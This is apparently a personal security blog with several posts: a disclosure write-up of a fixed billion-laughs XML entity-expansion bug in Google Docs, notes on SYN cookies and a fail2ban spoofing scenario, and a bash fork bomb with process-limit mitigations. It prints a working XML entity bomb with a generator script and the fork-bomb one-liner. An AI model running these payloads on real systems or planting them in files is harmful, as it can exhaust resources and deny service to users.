Google Docs Billion Laughs

This is a writeup of a bug (now fixed) I reported to Google last year.

A billion laughs attack was present in the Google Docs document parser: when the engine parsed a document, it resolved internal entities by expanding them. This eventually earned me a spot on the Google Wall of Sheep, but alas, no reward, because it’s a DoS bug and DoS bugs don’t qualify.

With any type of DoS bug on a large service, it’s fairly difficult to determine the exact severity. There are probably mitigating factors: throttling, per-user API limits, and so on. Regardless, a single request could likely tie up a processor for some amount of time (evidence suggests at least a couple of minutes, and I suspect a lot more). This was clearly a bug: Google Docs was resolving internal entities without limit, which is a CPU-intensive operation that requires very little client processing or bandwidth.

Here’s a link to a 17th-order billion laughs document: test17. Unzip it and look in content.xml. To increase the order of the attack, change the entity it references (e.g. &a19;, &a20;, etc.). The attack itself is very straightforward; for those who don’t want to look at the doc, it looks something like this, generated mostly from a legitimate ODT file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE billion [
  <!ENTITY a0 "Bomb!">
  <!ENTITY a1 "&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;">
...
  <!ENTITY a25 "&a24;&a24;">
]>
...
<text:p text:style-name="Standard">Test &a17;</text:p>
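
For completeness, the entity declarations elided above are trivial to generate. Here’s a rough Python sketch (mine, not part of the test document) that prints the same a0 through a25 entity chain used in the sample:

# Prints the entity declarations for the DOCTYPE above.
def entity_declarations(max_order=25):
    lines = ['  <!ENTITY a0 "Bomb!">']
    for i in range(1, max_order + 1):
        lines.append(f'  <!ENTITY a{i} "&a{i-1};&a{i-1};">')
    return "\n".join(lines)

print(entity_declarations())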

Here are some interesting metrics on various laugh sizes (a rough calculation of what each order expands to follows the list):

  • 16th order took about 4 seconds for the app to return
  • 17th order took about 8 seconds for the app to return
  • 18th order took about 20 seconds; the upload was eventually rejected after several empty files were created with the same name
  • 20th order took about 1:20; the upload was eventually rejected and dozens of empty files were created (I’m not sure what was going on with that).
  • 21st order never seemed to “finish”
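
As a rough sanity check (my arithmetic, not something from the report): each entity is two copies of the previous one, so &aN; expands to 2^N copies of "Bomb!". In Python:

# Expanded size of the text for each order tested above.
for order in (16, 17, 18, 20, 21):
    print(order, 2**order * len("Bomb!"), "bytes")

That’s only about 10 MB of expanded text even at 21st order, which is what makes the processing times above interesting.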

One quick note: I never found anywhere that external entities were resolved. It’s hard to tell for sure, because egress or chroot-type mitigations could simply have made that hard to observe or exploit. Correct or not, I suspected the external entity angle might not be a problem: OpenOffice resolved internal but not external entities, so (right or wrong) I guessed it’s somewhat likely that Google is re-using, or at least mimicking, OpenOffice’s document parser.

The reporting process was fairly nightmarish, but I put the blame mostly on MSVR rather than Google… not to point fingers; all I know is I never heard much of anything back.

I think DoS bugs against any serious service get a bad rap. I’ve met a lot of people who consider a DoS bug low severity based on that classification alone. In reality, I think people tend to care a lot more when an online service is unavailable. When Sony did everything terribly, did most people care about the data they lost? Some did (I did), but I think most just wanted to start playing games again. So what’s more severe: a clickjacking bug in Facebook that allows a targeted attack to take over someone’s account, or a DoS bug that can bring down Facebook?

With some imagination, I wonder if something like this could have been used in the right (wrong?) hands to bring down a service as large as Google Docs.

SYN cookies

An interesting cryptographic way to deal with SYN floods is SYN cookies. A SYN flood is simply a stream of SYN packets from spoofed IP addresses, and it’s a fairly common DoS attack. Other ways to deal with it include increasing the SYN queue size and decreasing the time spent waiting for the reply, but these don’t really solve the problem.

SYN cookie support is compiled into the Linux kernel by default (though it’s usually not enabled). You can find and configure this feature under /proc/sys. For example, to enable it you could run:

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

SYN cookies are a way of constructing the server’s initial sequence number in the TCP handshake so that, when a legitimate client returns the final ACK, the kernel can verify it with a keyed function and rebuild the queue entry on the spot. This means the kernel doesn’t have to hold resources for a half-open connection after receiving the first SYN.

A normal TCP handshake looks like:

SYN
SYN-ACK
ACK

Under a SYN flood, most of the SYN-ACKs you (the target of the attack) send will never be answered with a final ACK, since the SYNs that prompted them were forged. SYN cookies are an effective defense against this: a server that uses them doesn’t have to drop connections when its SYN queue fills up.
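
To make the mechanism a little more concrete, here’s a heavily simplified Python sketch of the idea. This is not the actual Linux algorithm (which packs a timestamp, MSS encoding, and hash into 32 bits more carefully); the secret, hash choice, and MSS table here are stand-ins of my own:

import hashlib
import hmac
import time

SECRET = b"per-boot server secret"       # assumption: any server-local secret works
MSS_TABLE = [536, 1220, 1440, 1460]      # a few MSS values we can encode in 2 bits

def syn_cookie(src_ip, src_port, dst_ip, dst_port, mss_index):
    # a slowly changing counter keeps cookies from staying valid forever
    counter = int(time.time()) // 64
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}:{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    # top bits come from the keyed hash, the low 2 bits store the MSS index
    return (int.from_bytes(digest[:4], "big") & ~0x3) | mss_index

def check_ack(ack_number, src_ip, src_port, dst_ip, dst_port):
    # the final ACK acknowledges our initial sequence number + 1
    cookie = (ack_number - 1) & 0xFFFFFFFF
    mss_index = cookie & 0x3
    if syn_cookie(src_ip, src_port, dst_ip, dst_port, mss_index) == cookie:
        return MSS_TABLE[mss_index]      # valid: rebuild the connection state
    return None                          # bogus or stale, drop it

The point is that everything the server needs in order to accept the final ACK can be recomputed from the packet itself, so nothing has to sit in the SYN queue.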

For more information about syn cookies, see http://cr.yp.to/syncookies.html

For why it might not be enabled by default see: http://www.mail-archive.com/netdev@vger.kernel.org/msg61116.html

Despite this, enabling them probably makes sense in many environments.

fail2ban attack

I was talking about fail2ban running on my firewall, with a certain IP being the only one allowed in (as specified in iptables). First of all, I should probably be using port knocking or something better for this scenario (in fact, after the comment I went ahead and put SPA on the firewalls, something I’ve been meaning to do for a while anyway), but that’s beside the point.

fail2ban works by denying an IP address for a set amount of time after repeated failed logins. It does this by watching log entries in /var/log/auth.log and writing corresponding iptables rules. It’s mostly used to limit SSH login failures.
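
The core loop is simple enough to sketch in a few lines of Python (this is just an illustration of the idea, not fail2ban’s actual code; the threshold and log regex are assumptions on my part):

import re
import subprocess
from collections import Counter

AUTH_LOG = "/var/log/auth.log"
MAX_FAILURES = 5                         # assumed threshold; fail2ban's is configurable

failed = Counter()
pattern = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")

with open(AUTH_LOG) as log:
    for line in log:
        match = pattern.search(line)
        if match:
            failed[match.group(1)] += 1

for ip, count in failed.items():
    if count >= MAX_FAILURES:
        # fail2ban also removes the rule again once the ban time expires
        subprocess.run(["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"], check=True)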

If you spoofed the IP address of the machine I was logging in from, you could maybe launch a DoS by getting the legitimate machine banned. Realistically, I think the attack would not succeed. Here’s what would happen:

  1. An attacker sends a spoofed connection packet to my firewall using the legitimate IP address (so it makes it through my dummy firewall).
  2. The SSH server responds with a SYN-ACK to the legitimate IP address (not to the attacker).
  3. The machine at the legitimate IP address doesn’t know where this came from, so it either drops it or, if it has no firewall controls of its own, sends a RST packet.

The point is that the handshake is never completed, so there is never a failed-login entry in /var/log/auth.log, and it never gets as far as fail2ban.

Bash Bomb

So my buddy Greg pointed me to what he called a ‘bash bomb’.  It looks like:

:(){ :|:& };:

Anyway, all it does is fork recursively. http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/ gives a good explanation. I do like it for its simplicity and obscurity. I have to deal with recursively forking things all the time (thanks, operating systems class, where students experiment with fork for the first time).

A simple PAM hard limit on the number of processes can mitigate this. Put it in /etc/security/limits.conf.

My applicable limits are (fairly liberal):

*               soft    nproc           225
*               hard    nproc           300
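
A quick way to confirm the limit actually applies to a new login session (a small check of my own, using Python’s resource module, which exposes RLIMIT_NPROC on Linux):

import resource

soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
print("soft:", soft, "hard:", hard)      # should print 225 and 300 with the limits above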

So far, nothing has crashed the system with these, but I keep having to tweak them, so I may restrict them further in the future.